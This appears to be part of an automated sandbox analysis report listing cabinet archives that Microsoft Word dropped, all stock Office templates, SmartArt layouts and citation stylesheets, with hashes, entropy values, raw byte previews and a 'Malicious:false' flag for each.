                                                  SHA-256:3EE9AE1F8DAB4C498BD561D8FCC66D83E58F11B7BB4B2776DF99F4CDA4B850C2
                                                  SHA-512:2705644D501D85A821E96732776F61641FE82820FD6A39FFAF54A45AD126C886DC36C1398CDBDBB5FE282D9B09D27F9BFE7F26A646F926DA55DFF28E61FBD696
                                                  Malicious:false
                                                  Preview:MSCF............D................................?..................................chevronaccent.glox.................Content.inf..O.$N...[.........B.....?.....$Zy..Zkr...y<.....Di-.aVX/....h..-.~........#.../.Fz....T...p....A..eHMe[..p...=................f..../%o......F@..=..$.B!....}.0..g..^vlI......f.W.F...Nm..2`...)...,.HL4.nsl.F.ir.k..e.!^.j2.v.iT....t...*..!h..Y...2Q..-.x.,.Xj.U.cj,....9.....)..W..n3f.......(cH.D.4M.!.+..4..3r..y......|r..@.PD.R..#...F..nJAR..1{-.....u3..$..L.b+h....:lZ.>....q.?. ~l..^.%.m....a...cG.h.?.|.?7.'....b.G.4..'..A...o.Z...//..?...d..*.....C..Z.....]Yv.g.]..... .........]x.#=.../.7;R.j....G.....zq=O`[.'5g.D.u..)..../../.v.JmCW.da....3.f..C.z%...S=....;A.q.|....z.E.aRu........ k..J"+.f.S.@.........eD4....\0..t./U..%.H..........M:..U.......J...Z..H.DG..u^..D..P....`.^b.........`c......#.....c.?...#..C.V.&.'..f.'...f.[..F.O..a...&..{TiXg4; .X."..0...B.#..^..........N"..w.@f...gd.S..K.....E....ZR...;.twR>.z.
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft Cabinet archive data, many, 4091 bytes, 2 files, at 0x44 "BracketList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                  Category:dropped
                                                  Size (bytes):20235
                                                  Entropy (8bit):7.61176626859621
                                                  Encrypted:false
                                                  SSDEEP:384:j3W3yGyjgbA8E0GftpBjEHvFLrHRN7pDAlI66Yv1:j3WFyAA8Pi6HVpDZ66c1
                                                  MD5:E3C64173B2F4AA7AB72E1396A9514BD8
                                                  SHA1:774E52F7E74B90E6A520359840B0CA54B3085D88
                                                  SHA-256:16C08547239E5B969041AB201EB55A3E30EAD400433E926257331CB945DFF094
                                                  SHA-512:7ED618578C6517ED967FB3521FD4DBED9CDFB7F7982B2B8437804786833207D246E4FCD7B85A669C305BE3B823832D2628105F01E2CF30B494172A17FC48576D
                                                  Malicious:false
                                                  Preview:MSCF............D................................?..................................BracketList.glox.................Content.inf....7r...[.... G.q..@...B.....?X!.A.......!........X..Vk.JK...Z..=......PD.....P....5...jp..+..T....b.)np5.7.....Zz........... ..!.....S......1....`....h......T?.Nq../......z....[..:..5f;....O...d.FxD...4...Z....[..a...w..W.[..P...5.]...6..."...+t].!...2\%%`Q.\..)...=>.)......a.$.2.,...2,.Lw.?..+..qf....h....T/B.....}T.E...'.%.....,.......X....b..gt.hPYc|.....a...j...=...{..a.`!8!..|...L.T..k..!,.R.z/W....{..,...+..w.m..sQ..7<x..B....?....\.)..l...d...}.....v..W.C..'=p1c.Z=.W.g.e....&wm..N,..K.T../.oV../=9.}.....".28...r.Q....dzj{....S...1m...x9_...2PXpa...Q.n.$z...c..SGq...k......}kPE..*...3.|.5A.>..6.......+)qCB....q....qNkGe...W]..o..Z...J.<.i......qq.8....q..BE.(...._h.U.\@3.F...KdO..=1j+....).*Q.|B..Z..%......LDYk....j.....{klDW..#CVy}...X..O!..}..s..&..DC.....tL.j..b.......[...n.'..1..Xc...9Q..gM.....n..3...v.....~.).
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft Cabinet archive data, many, 5864 bytes, 2 files, at 0x44 "architecture.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                  Category:dropped
                                                  Size (bytes):22008
                                                  Entropy (8bit):7.662386258803613
                                                  Encrypted:false
                                                  SSDEEP:384:M7FUtfIdqSHQs7G8E0GftpBjED/C4RQrFLrHRN7TT8DlvQyUTL2mH:sWgdqR2G8Pi6D6YQZTTMvU+mH
                                                  MD5:ABBF10CEE9480E41D81277E9538F98CB
                                                  SHA1:F4EA53D180C95E78CC1DA88CD63F4C099BF0512C
                                                  SHA-256:557E0714D5536070131E7E7CDD18F0EF23FE6FB12381040812D022EC0FEE7957
                                                  SHA-512:9430DAACF3CA67A18813ECD842BE80155FD2DE0D55B7CD16560F4AAEFDA781C3E4B714D850D367259CAAB28A3BF841A5CB42140B19CFE04AC3C23C358CA87FFB
                                                  Malicious:false
                                                  Preview:MSCF............D................................?..................................architecture.glox.................Content.inf..q5.^...[.....0y......../..CL.C5.Q..U5g.z....UUUMPC...C..P....T.....=..s..4c...-3H..E...2..2*..T...../.i.;$..............%...................'h.........#0.......[........c.h.....O...%.61...[.J..:.,^....W.]$..u...N.R.....H.......:%I.g5Kd.n6...W2.#.UL..h.8NN../.P...H.;@.N.F...v."h..K.....~.....8...{.+...&.#A.Q'..A.....[NJ.X.....|.|.G5...vp.h.p..1.....-...gECV.,o{6W.#L....4v..x..z..)[.......T.....BQ.pf..D.}...H....V..[._.'.......3..1....?m..ad..c(K.......N.N.6F%.m......9...4..]?...l6..).\p;w.s....@...I%H.....;\...R......f...3~:C...A..x....X...>...:~.+..r@..."......I..m.y..)F.l..9...6....m...=..Q.F.z..u......J].{WX...V.Z.b.A0B..!....~.;Z.....K.`c..,X.MFz....].Q.2.9..L."...]...6...JOU..6...~../......4A.|.......i.LKrY...2.R.o..X.\....0.%......>H.....8.z..^....5d|...4|...C......R28.E......a....e...J.S..Ng.]<&..mm
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft Cabinet archive data, many, 6005 bytes, 2 files, at 0x44 "HexagonRadial.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                  Category:dropped
                                                  Size (bytes):22149
                                                  Entropy (8bit):7.659898883631361
                                                  Encrypted:false
                                                  SSDEEP:384:b98FG/zdCbf7BOEawSi8E0GftpBjEPTFPxFLrHRN7S5ll7PK/pA2:N/zAbDae8Pi6PFPSRIA2
                                                  MD5:66C5199CF4FB18BD4F9F3F2CCB074007
                                                  SHA1:BA9D8765FFC938549CC19B69B3BF5E6522FB062E
                                                  SHA-256:4A7DC4ED098E580C8D623C51B57C0BC1D601C45F40B60F39BBA5F063377C3C1F
                                                  SHA-512:94C434A131CDE47CB64BCD2FB8AF442482F8ECFA63D958C832ECA935DEB10D360034EF497E2EBB720C72B4C1D7A1130A64811D362054E1D52A441B91C46034B0
                                                  Malicious:false
                                                  Preview:MSCF....u.......D...........................u....?..................................HexagonRadial.glox.................Content.inf.........[.....`........./.mT.T6...CP..z5...0.PcUmCUSUCU.Q.P.0..f............^...H..2e.[..8...ld......*F.%.j.w!R..NA.L............ .r..z....$&.........P.=.r...O...e..dfv_.i%.C....^......?..x...+d..].B.3..EU...|Cc..z.`lQp..fr.....8!;.8.p.ZwH\.........~..T.t..]..H.]..S.2..Vt.....r.H../..-8........!:.Y&..|A..J.U...-.%..k..U...4m.. .q../..b.8.vc~......_q1.?..Bh.v.....L..I.$I..s.".u.. Y....I^5.v...3.......].^)b.t.j...=...Ze~.O...|.}T.._9c........L....BV.^......X..?.....{.>.j..5.m...d.7........g[..f.nST...i..t..|.T.jjS..4p.Pxu..*..W...|.A)..|9;....H.e.^.8D..S...M..Lj.|...M.m+..H.....8.&-....=.L.....n.v..M.9...l....=r......K.F.j.(.(xD.3..r'9.K..-...5..Z..x....._....a[...J...`.b_a\\j.ed..\.3.5....S.T...ms.....E...Xl.y.LH=...}..0.T...04.4..B[..H.....B{B9.h..=.8Mn.*.TL.c..y.s.?.c9$l...).h).6..;.X../_>Pl...O...U.R..v.dy$A
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft Cabinet archive data, many, 10800 bytes, 2 files, at 0x44 "ConvergingText.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                  Category:dropped
                                                  Size (bytes):26944
                                                  Entropy (8bit):7.7574645319832225
                                                  Encrypted:false
                                                  SSDEEP:384:sbUX16g8/atF4NB3TJOvqeMRD/8svIZj/OwgbA8E0GftpBjEYwFLrHRN7mYll7PY:sbhg8yY4nMZK2hA8Pi6Yum4IVR
                                                  MD5:F913DD84915753042D856CEC4E5DABA5
                                                  SHA1:FB1E423C8D09388C3F0B6D44364D94D786E8CF53
                                                  SHA-256:AA03AFB681A76C86C1BD8902EE2BBA31A644841CE6BCB913C8B5032713265578
                                                  SHA-512:C48850522C809B18208403B3E721ABEB1187F954045CE2F8C48522368171CC8FAF5F30FA44F6762AFDE130EC72284BB2E74097A35FE61F056656A27F9413C6B6
                                                  Malicious:false
                                                  Preview:MSCF....0*......D...........................0*...?..................t,..............ConvergingText.glox.....t,..........Content.inf..C..)t-[.....@.........=...xxA. ...E^....x.x.^.......x..^^...DF.......s..d.P.....5.;..]...2.t.w.....O9.G..;.'.T....@I.,.q.u.3..P...9... ....`J.......g.(....).,.h0.....$.3..;.._.....~.de.jj.....U..K.0....`.@.H.1.x.Z.@..q....?....x.wW.....+am8A".....I..)..]...s..-z.2S+|.Cb.t6f],.n.LV......OVg....O.at|..-..x.....:....]s...u..g}.P..v.3....^.".%..%...#.2.....l00...n.......r8.p.....^.....n.)..,..t.^$b...b.q.W...F..R...n.-.+..'........Aw=._OwH....8.:s..{.#..{N.hW..`.._........Wy....>U.?....-.8tg...=..y..@.,.v|......l...t..l#{...H....9..|......~...De..#@y.&K....U...q.c.zK..D.<pV.....Ql..&Y...=#...w....r.`#2....Ug.J(..T...KmW.@...!....j:......M......!..E.7#s.t..F.aU..N....-.i......|w.lr..G.n.,.......=Kl.-m.?F.....v]?.......{q.U.t...<.|..u.....3R.`.t.T.>;v.....KQ...S...7..1...N.kN.y.)v.....3H:..D.{.+.(......u..^W&.
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft Cabinet archive data, many, 30269 bytes, 2 files, at 0x4c "Text Sidebar (Annual Report Red and Black design).docx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 2 datablocks, 0x1203 compression
                                                  Category:dropped
                                                  Size (bytes):46413
                                                  Entropy (8bit):7.9071408623961394
                                                  Encrypted:false
                                                  SSDEEP:768:WaxA0CH65GY3+fvCXCttfR8JEBrkquwDn+QV5V+vNWBatX/xG8Pi65sMuMjvU+mQ:hne65GYOfKXMSEBrBtDnzFAI4JxP75sM
                                                  MD5:C455C4BC4BEC9E0DA67C4D1E53E46D5A
                                                  SHA1:7674600C387114B0F98EC925BE74E811FB25C325
                                                  SHA-256:40E9AF9284FF07FDB75C33A11A794F5333712BAA4A6CF82FA529FBAF5AD0FED0
                                                  SHA-512:08166F6CB3F140E4820F86918F59295CAD8B4A17240C206DCBA8B46088110BDF4E4ADBAB9F6380315AD4590CA7C8ECDC9AFAC6BD1935B17AFB411F325FE81720
                                                  Malicious:false
                                                  Preview:MSCF....=v......L...........................=v...?..................5u......................Text Sidebar (Annual Report Red and Black design).docx.v...............Content.inf..C,.zd..[............... .w.....b...wwww]r..W\ww...... .hh...........o.nz.....Ku.7..-.oH...h;.N..#.._.D,}......!Q$..Un.tI11..$w.r3... ..p...=.1....""..n...*/....h.A...Y..c,.Q.,......",..b.1.w..$.....l../;..J.....~.. ....+.R#....7.-..1.x.feH.@.......u...(.DQ%.wL.N|.xh...R..#....C...'X.m.....I{W.....5.C.....\....z.Y.)w..i...%....M..n.p.....{..-G9..k.bT.6........7....).....6..ys.....R.e.....0.Xk`.3..X\xL..4J"#.f...:....r..2..Y.uW..052.n.+ ..o..o..f&u.v.&9y.P..6.K..in.DU.#.~....4i..6;.5.w..i...g.(....../..0*Vh...C..//....W..:w......7.6....]....4.*9...sL.0k...zHh..2N.H...*..]..(.x.:..........Y.+...-.....&.*^..Q.sW...v..w.....k.L.e.^.W4iFS..u.....l.g'...b~:Zm...S.2.|......5S..=.............l.../|....G|.9 ..#.q...W.Q...G=.."W..'.6....I....D._.{.g.47....V.1._..<?....m............)..T.
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft Cabinet archive data, many, 19375 bytes, 2 files, at 0x4c "turabian.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 11 datablocks, 0x1203 compression
                                                  Category:dropped
                                                  Size (bytes):35519
                                                  Entropy (8bit):7.846686335981972
                                                  Encrypted:false
                                                  SSDEEP:768:2LFougzHaUdBKUsM+Z56zBjA8Pi6bo+ld8IX:MFodzHaULR9P7bo+l6IX
                                                  MD5:53EE9DA49D0B84357038ECF376838D2E
                                                  SHA1:AB03F46783B2227F312187DD84DC0C517510DE20
                                                  SHA-256:9E46B8BA0BAD6E534AF33015C86396C33C5088D3AE5389217A5E90BA68252374
                                                  SHA-512:751300C76ECE4901801B1F9F51EACA7A758D5D4E6507E227558AAAAF8E547C3D59FA56153FEA96B6B2D7EB08C7AF2E4D5568ACE7E798D1A86CEDE363EFBECF7C
                                                  Malicious:false
                                                  Preview:MSCF.....K......L............................K...?...................J.......@..............turabian.xsl."...............Content.inf._.......[...T.....C4.5...E0B.]...+.-f....rc.[52.$...a..I....{z...`hx.r...!.. $...l..\....#3EF..r..c;<p...&n.\b..K..0Y..c+.2...i..B..wwY..77,...........}.q.C.......n..,.....prrx.QHy.B#..,.'....3....%1.``..hf...~...[.[n.v.s..y.vw....;..s.G293G&H....$E......m.&^..iy/.4.C...D...".(H&..&.I4._...!...... ........q.k1.d.....qc.3.c.....;.5.......y}...}&...+.WAN.,zVY.Q....V.Tz........g..H..c...E2jY...4g?.yf<....V.M.s.$..k.Id....+..?..._.\.s.k..9..I%;.yWQ..S..]..*.n<.7........=......"Q.*E.....MG..j.Yt..!U....Q.j...v.h-.~b..e&.......;...\.....:.....=..Xv1&q........6\...xw.%*.VdS..H...o...s.....+..%[../>.t..I....F.....".G|.....=....[..S..3..a.C.ZZ...tK.6N..b........)>........I..m..QE.M.nv.MVl.....vCG>,.suP.gqo.rr....J`m....J.b..},[F*....e.A.]..r....C4.?JJs6..l.].9...Q.B.~.......\d%.X ...8A....rH....&?#...^.....4.h.{>
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft Cabinet archive data, many, 12767 bytes, 2 files, at 0x4c "ieee2006officeonline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                                                  Category:dropped
                                                  Size (bytes):28911
                                                  Entropy (8bit):7.7784119983764715
                                                  Encrypted:false
                                                  SSDEEP:384:WnJY165YD0tPYoCKa3HueqRyzVscLk1Yj2GjcgbA8E0GftpBjE2kWTpjFLrHRN7N:X4rtPzCK6uRoljXBA8Pi62ZphL0HRA5p
                                                  MD5:6D787B1E223DB6B91B69238062CCA872
                                                  SHA1:A02F3D847D1F8973E854B89D4558413EA2E349F7
                                                  SHA-256:DA2F261C3C82E229A097A9302C8580F014BB6442825DB47C008DA097CFCE0EE4
                                                  SHA-512:9856D88D5C63CD6EBCF26E5D7521F194FA6B6E7BF55DD2E0238457A1B760EB8FB0D573A6E85E819BF8E5BE596537E99BC8C2DCE7EC6E2809A43490CACCD44169
                                                  Malicious:false
                                                  Preview:MSCF.....1......L............................1...?...................0......"}..............ieee2006officeonline.xsl.:...............Content.inf.........[...G."...3$pE...G B....m3o[...I2&.f.,\..........}.n..{..e.8!^.3.A@...x..... .D.52gU..]..."..N8....s..CS..J3..HV...m...y..o....F.z......V.j._....=~k.....'.dY........1........#...d13.g.&C...C.xw.`f.hf..........]M....m.m....ud...,+.H~..cL...e#;(RI...eA....I.b...E...2..(...$.j...L...$..A....'[...H9..&..G.Q....".M.yl....]..?j%+....O~.*....|.se...K\.B"W..F.5.......=s...l.Y...K..yN.TBH[...sTWR.N.d...WEa....T.d.K.^sauI......m..s=.,qso5.b.V.s.]..9..,k4.\..L.;D...........;r.C...7.w.j..:N8.V6..a.3..j:A.mA..To..$.5....:./..p.x.3.=..__...8.EB.K.*..].-."..5-XU..J.....=o..K.Wavg.o].z.9.gk.._.........MZ.<.5............OY.n.o...r.9v.c.......[n.[..D...d..}.j.....LB,]_.9..St.@..C....\...^....-&.njq..!P....G^.....w.7.p~.......M..g.J............t1......q.w.rx...qp.....E.........-...2..G.........z.]B........d....C.@...@.
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft Cabinet archive data, many, 15691 bytes, 2 files, at 0x4c "gb.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                                                  Category:dropped
                                                  Size (bytes):31835
                                                  Entropy (8bit):7.81952379746457
                                                  Encrypted:false
                                                  SSDEEP:768:ltJDH8NmUekomvNufaqA8Pi6x5q3KQIGu:lvINukgzP7x5mRIGu
                                                  MD5:92A819D434A8AAEA2C65F0CC2F33BB3A
                                                  SHA1:85C3F1801EFFEA1EA10A8429B0875FC30893F2C8
                                                  SHA-256:5D13F9907AC381D19F0A7552FD6D9FC07C9BD42C0F9CE017FFF75587E1890375
                                                  SHA-512:01339E04130E08573DF7DBDFE25D82ED1D248B8D127BB90D536ECF4A26F5554E793E51E1A1800F61790738CC386121E443E942544246C60E47E25756F0C810A3
                                                  Malicious:false
                                                  Preview:MSCF....K=......L...........................K=...?..................q<......................gb.xsl.................Content.inf.EF/.....[...A....3D.4..oVP!i/......t.6..l&9r0.8......c..q.^........$/..(./H ...^_Z0\4.42WU......P.F..9.._....'.D..<H@..E.b,K..9o..wo..v|..[.{7m.......|}aI..|g....IF2au?.1,..3.H.......ed....-.........m....$..8&0..w........2....s....z..d.Z.e.....@$r[..r..4...."E.Q@...Hh.B"b>...$.L.$.P.._..~.?./T..@..F..?.~G...MS..O%Z3*k..:..._...!GF..U...!..W..$..7...j......xy0..../.j..~4......8...YV....Fe.LU..J.B.k%BT5.X.q.w.a4....5..r...W.6.u...]i...t.....e.\.K............#t.c5.6....j...?#..{.m3.L9...E/....B[R.k(.'....S.'.}!j.tL..v....L....{<.m4......d_kD..D.....4`aC....rg..S..F.b..^........g;.`?,......\..T.\.H.8W.!V...1.T1.....|.Uh....T..yD'..R.......,.`h..~.....=......4..6E..x#XcVlc_S54 ..Q.4!V..P...{w..z.*..u.v....DC...W.(>4..a..h.t.F.Z...C.....&..%v...kt....n..2....+.@...EW.GE..%.:R`,}v.%.nx.P.#.f.......:.5(...]...n3{...v........Q..
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft Cabinet archive data, many, 14864 bytes, 2 files, at 0x4c "mlaseventheditionofficeonline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                                                  Category:dropped
                                                  Size (bytes):31008
                                                  Entropy (8bit):7.806058951525675
                                                  Encrypted:false
                                                  SSDEEP:768:ktH7oN/HbwiV+M+4Jc+5UrT3czi5uOHQA8Pi6DxUR/WTZIy:87sPEANXJc+eTMsuzP7DmN0ZIy
                                                  MD5:E033CCBC7BA787A2F824CE0952E57D44
                                                  SHA1:EEEA573BEA217878CD9E47D7EA94E56BDAFFE22A
                                                  SHA-256:D250EB1F93B43EFB7654B831B4183C9CAEC2D12D4EFEE8607FEE70B9FAB20730
                                                  SHA-512:B807B024B32E7F975AED408B77563A6B47865EECE32E8BA993502D9874B56580ECC9D9A3FEFA057FDD36FB8D519B6E184DB0593A65CC0ACF5E4ACCBEDE0F9417
                                                  Malicious:false
                                                  Preview:MSCF.....:......L............................:...?...................9......................mlaseventheditionofficeonline.xsl.L...............Content.inf.N.#.....[...>..9..3c.5...F.B.]Y.3..%d.8...v;....~Y.L.=..v..m.g...|K.B....$......s.......#CdE.p.p..@...j.Nl2'...L..N.G:-V:.d.....i..M........mK.w.....\W.<.`..b$.!..!3..rT.A..#.).;KZ...a.-..j&e`R.~7dIRS.I..f.ff....}.}....^[wo.uw..i.m7......v$.I..n....-.Z.M5...iH..Ea..., [..0.L...DH..." ..... .@...H.@..+...}.......*^..'.4*.tHa..f].gV..~.7V.....C..).(.U"..f.@l..j'..%\.u.UU.....9<13...5..=........./..Z..{..-.L].+Y.fL.<EJ.q..!.j....W..]E./.~Y>...GgQ..-....Q.C..5..T+...fO. .)..~.7..Y....+..U=.e..8w.m...._..S..v.d.* ......S3z.X)......u...t.......i.;.a...X.Ji....g.3.!.O.....T.f6..[U....O..Z.X.q.G....?.k]..?...8.u.;].8y.T.9D..!?R....:........3+.P.....7?m}..............1...y3.g.\c.ks^;?.f.U5...U.j....E.N.}.!.......).R1....~.....R.....3.J.f...l..E^:...&_..%..v...^..E...rC..O....M.#..<..H..bB.+.W..
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft Cabinet archive data, many, 27509 bytes, 2 files, at 0x4c "Equations.dotx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 2 datablocks, 0x1203 compression
                                                  Category:dropped
                                                  Size (bytes):43653
                                                  Entropy (8bit):7.899157106666598
                                                  Encrypted:false
                                                  SSDEEP:768:+bjfeR1OOZvv439PlDe5/QzhgFSo0UEDmJwkqTA8Pi63Bsgn66w:IM3CN9ZzhFbUUwaP73BsB6w
                                                  MD5:DA3380458170E60CBEA72602FDD0D955
                                                  SHA1:1D059F8CFD69F193D363DA337C87136885018F0F
                                                  SHA-256:6F8FFB225F3B8C7ADE31A17A02F941FC534E4F7B5EE678B21CD9060282034701
                                                  SHA-512:17080110000C66DF2282FF4B8FD332467AF8CEFFA312C617E958FDFEBEE8EEA9E316201E8ABC8B30797BB6124A5CC7F649119A9C496316434B5AB23D2FBD5BB8
                                                  Malicious:false
                                                  Preview:MSCF....uk......L...........................uk...?...................j......r...............Equations.dotx.................Content.inf.94v..R..[..... .............v........." Vw.w..r.....D.V5.p...W......b;....\x.....f.-...............l.....L.F..*..@..BnF.I.....%1..0....&.X.......X-.\.\.>..A....@..:...N .G./.Sp.A0.0.`.....q....b... ......S.{K...V....J............>\....\.E.#.,$.hxu.F.Fo....<...{..6../..#..l>d...w...&...S.....L.].....^..L......;~l.......qw.o. .....v.u.W`.4Z.A.....dC..Q)9.c..qgtfJ..G.(.J....q4V.).mK4;..zY..b.5&....V...0X.].Z..U.Lx..^..:8XQh.....7yy.._5............c.W...c...xY..%..G.$....kg^.1g.9.....z^.'...q."..K)a[.pW .LS.:Q8.....2..._q.os....y...d11.*.m....8.,.^.4_?i.e.u.,....._y.....zZZA.D.D<..+....{....Sfnv...t.....0...vV..y.r..3..%.<.t......;.h.wh.-.g.>..5...R...........y..]^..R..<...>$~.'...kk.n..H.EN.eQ.Q.O./='....)t.l0,/].....FNN......?...&..'.eS....K.K.v".^L..x=.^......1x|....=}@...B.kq;_a..C.q?..Y9.v......Q..u.G..V.
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft Cabinet archive data, many, 4410 bytes, 2 files, at 0x44 "PictureFrame.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                  Category:dropped
                                                  Size (bytes):20554
                                                  Entropy (8bit):7.612044504501488
                                                  Encrypted:false
                                                  SSDEEP:384:zEAH676iPi8+IS5iqn7G8E0GftpBjExDxIHFLrHRN7Ke/ll7PK/pGaz6:zEhG8+ISrG8Pi6xDxCKoIGaz6
                                                  MD5:486CBCB223B873132FFAF4B8AD0AD044
                                                  SHA1:B0EC82CD986C2AB5A51C577644DE32CFE9B12F92
                                                  SHA-256:B217393FD2F95A11E2C594E736067870212E3C5242A212D6F9539450E8684616
                                                  SHA-512:69A48BF2B1DB64348C63FC0A50B4807FB9F0175215E306E60252FFFD792B1300128E8E847A81A0E24757B5F999875DA9E662C0F0D178071DB4F9E78239109060
                                                  Malicious:false
                                                  Preview:MSCF....:.......D...........................:....?..................................PictureFrame.glox.................Content.inf........[.... '.q..@.........<./..+./. ...."o.o./..{^a.7^.D.HA....^J... ...........T%q..b...+pz.n.=....jT.+M..=H..A...py.3.........H...N...[..%..~....>.%....3.r...wx.....0.....7..94..2..45..7f.......D.. ...[...f.:H..../N..4.....8.....:x.I....u|.`."...\..N..%.M#..^v$.*....T.m.....?.-.wki.X..8..F.G..Y.^8...-....+.&.+&.No...e!.#.8.....YF.......<w.....=.Q.S..7....MW....M..9A.3..c..L....|.E-Y....]n".|....b9..l@.d.T...a.f...~.&k.[..yS..q..]L}..)w.....$.@..v...[9..X....V...a.NK....m9.5.....Kq.;9`.U.e...8.<..)Y.H........z.G...3n.yWa.g.>.w!e.B8:......f..h..z....o.1<.RT..WK...?g .N..+..p.B.|...1pR_......@...a....aA......ye..8...+M.l..(.d..f.;....g........8R.\.w.:ba....%...|p....`lrA.|....a.U.m=ld......7....#..?Dq..D.....(.5.K.a..c.G..7..]hF..%:}......}J.j$.....4...l];..v>.&j........Y.vk..$1.@X$...k...9..?...z..![..../...).a.=....aZ^.3?....
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft Cabinet archive data, many, 9170 bytes, 2 files, at 0x44 "InterconnectedBlockProcess.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                  Category:dropped
                                                  Size (bytes):25314
                                                  Entropy (8bit):7.729848360340861
                                                  Encrypted:false
                                                  SSDEEP:384:75V23GNhfG/YvmBqWDP7G8E0GftpBjEB1vrFLrHRN7mKll7PK/pRU0:LS/Yvc7TG8Pi6BLm6IS0
                                                  MD5:C47E3430AF813DF8B02E1CB4829DD94B
                                                  SHA1:35F1F1A18AA4FD2336A4EA9C6005DBE70013C7FC
                                                  SHA-256:F2DB1E60533F0D108D5FB1004904C1F2E8557D4493F3B251A1B3055F8F1507A3
                                                  SHA-512:6F8904E658EB7D04C6880F7CC3EC63FCFE31EF2C3A768F4ECF40B115314F23774DAEE66DCE9C55FAF0AD31075A3AC27C8967FD341C23C953CA28BDC120997287
                                                  Malicious:false
                                                  Preview:MSCF.....#......D............................#...?...................#..............InterconnectedBlockProcess.glox......#..........Content.inf...<.:#.$[......O..........5f.P.5CU..6..jT..U..U..UM.T.........h................-... .......6...`.....G...........'.,DN:........... "..4..1u.....%.u..{{,....@lp..}..`.......Z...K.....Z..... Z4.<?..C.BF.....k.!Hl...]...Tvf..g....)...vny6.'..f....Z.R.`.......+....!..!.....:..4fj....."q..f..E..^!k.....M.c....R...B......g...~.........o.'.7,.e.,..7.R.e,(.+..+:....Q....f...P.H.I..U.....Jl...l...z.]7...C...<...L.,..@...i.{..e]K...2..KRW..7.-'.G.l!.n7..J.v.C...%/.....q...@..l..e..$..N..sg8]oo.(q(_.?.X.s...Ua..r0...Rz.o.eT.j...b*..}",n.qou..M.[.;%../c.x.4.z.2*.U.]..D...h...-R.$.=\3..P......N.mP......J...}BPn...g]d.5k..C.ee.ml...\.g...[.......<..6$.%.I#S9..I...6.i........_..P.n....c$.3..zw.hF......_{.+...o...[.&........&...M..m.....;....0....D7...4nQ.=/.._`._.nh.D.m..h.+....8..p..q.4.w.\...iy...*...lN6F..c.
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft Cabinet archive data, many, 6450 bytes, 2 files, at 0x44 "ThemePictureAccent.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                  Category:dropped
                                                  Size (bytes):22594
                                                  Entropy (8bit):7.674816892242868
                                                  Encrypted:false
                                                  SSDEEP:384:L7d2l8FbHaaIKbtv1gDISi8E0GftpBjEZRFLrHRN74bUll7PK/pd:LUlCIOt/8Pi6Zv4bMId
                                                  MD5:EE0129C7CC1AC92BBC3D6CB0F653FCAE
                                                  SHA1:4ABAA858176B349BDAB826A7C5F9F00AC5499580
                                                  SHA-256:345AA5CA2496F975B7E33C182D5E57377F8B740F23E9A55F4B2B446723947B72
                                                  SHA-512:CDDABE701C8CBA5BD5D131ABB85F9241212967CE6924E34B9D78D6F43D76A8DE017E28302FF13CE800456AD6D1B5B8FFD8891A66E5BE0C1E74CF19DF9A7AD959
                                                  Malicious:false
